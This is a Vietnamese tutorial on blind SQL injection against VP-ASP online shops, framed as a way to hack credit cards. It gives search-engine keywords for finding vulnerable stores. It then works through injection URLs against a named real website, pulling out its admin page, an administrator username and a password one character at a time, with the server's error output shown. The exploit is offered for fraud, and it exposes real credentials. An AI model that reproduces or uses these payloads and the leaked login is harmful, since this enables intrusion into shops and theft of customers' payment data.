Tài liệu Hacking Credit Card – Sql Blind V.1

Có một bài viết nằm trong Ebook Hacking Credit Cardversion 1, có cách hack giống
cách này nhưng có vẻ đây là bài viết đầy đủnhất.

Xin giới thiệu sơqua SQL Blind :
ã Đây là hình thức khai thác dựa vào lỗhổng bảo mật của MSSQL, dựa vào lỗhổng này
chúng ta áp dụng những đoạn mã đểkhai thác và tìm kiếm được thông tin từDatabase
của Server đó. SQL Blind là kiểu khai thác dò tìm từng ký tự, khi các bạn đã sửdụng đa
sốcác thao thác kỹthuật hack SQL khác mà không thành công thì có thểtạm nói SQL
Blind này có thềkhai thông những bếtắc đó, tuy nhiên bên mặt tốt luôn có mặt không tốt
đó là quá trình truy vấn SQL Blind tốn rất nhiều thời gian và công sức bởi vì các bạn phải
tìm từng ký tựmột trong chuỗi cần tìm . VD: tìm link admin thì các bạn phải tìm từng
chữtrong chuỗi Database vềlink admin và ghép chúng lại thành 1 chuỗi. Nói nhiều các
bạn rối thôi làm liền cho chắc dễhiểu.
Chuẩn bị:
- Trình duyệt Web Opera, Mozila Firefor v1.3 hoặc loại khác Internet Explorer là ok.
Không nên xài Internet Explorer đểHack (^|^)
- 1 ly nước và 1 cái khăn lau mặt đểchữa cháy & lau mồhôi.
Mục tiêu:
- Tất cảcác Phiên bản từ5.0 trởvềtrước của VP-ASP (loại shop tương đối nhiều lỗi và
nhiều cc chết (^|^))
- Các Tìm những Shop VP-ASP này thì có thểtham khỏa những từkhóa bên dưới dùng
cho việc search trên Google, Yahoo một site tìm kiếm bất kì nào đó.
- TừKhóa :
+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- Tôi chỉ đưa ra 2 từkhóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có
thểtìm ra được VP-ASP.
Chúng ta bắt đâu hack 1 site demo nha
Mục tiêu là hxxps://circleathletics.com/ (sửdụng VP-ASP V5.0)
- đầu tiên chúng ta tìm link admin của site này
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Nhưvậy có nghĩa là từkhóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi
link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp thửvới
câu lênh sau thay chữa = s
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='s')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int.
/shop/shop$db.asp, line 409
- Chính xác là chữS là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thếnhững chữ
khác và tiếp theo
-
hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fi
eldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20a
nd%20left(fieldvalue,2)='sh')
- Chú ý chỗnày nha (fieldvalue,2)='sh')
- Cú tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp nên không
cần tìm xem chuỗi ký tựcó bao nhiêu ký tự đâu
Tiếp theo chúng ta tìm user + pass admin
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Ko có gì hết tiếp tục nhưthế
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,1)='c')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'circ54' to a column of data type int.
/shop/shop$db.asp, line 409
Hiện luôn User ra luôn site này bịlỗi nặng nếu những site khác các bạn động não 1 tí như
khi tìm link admin là ok hihi
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,2)='ab')
đây là cách tìm ký tựthư2 , thứ3 thì them vào (fldusername,3)='abc') dậy đó dễmà.
Chúng ta đã có user admin ởtrên rồi circ54 tìm pass của nó
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp
assword,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 13
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp
assword,1)='2')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '2005HCP' to a column of data type int.
/shop/shop$db.asp, line 409


Còn đây là 1 sốtham khỏa thêm .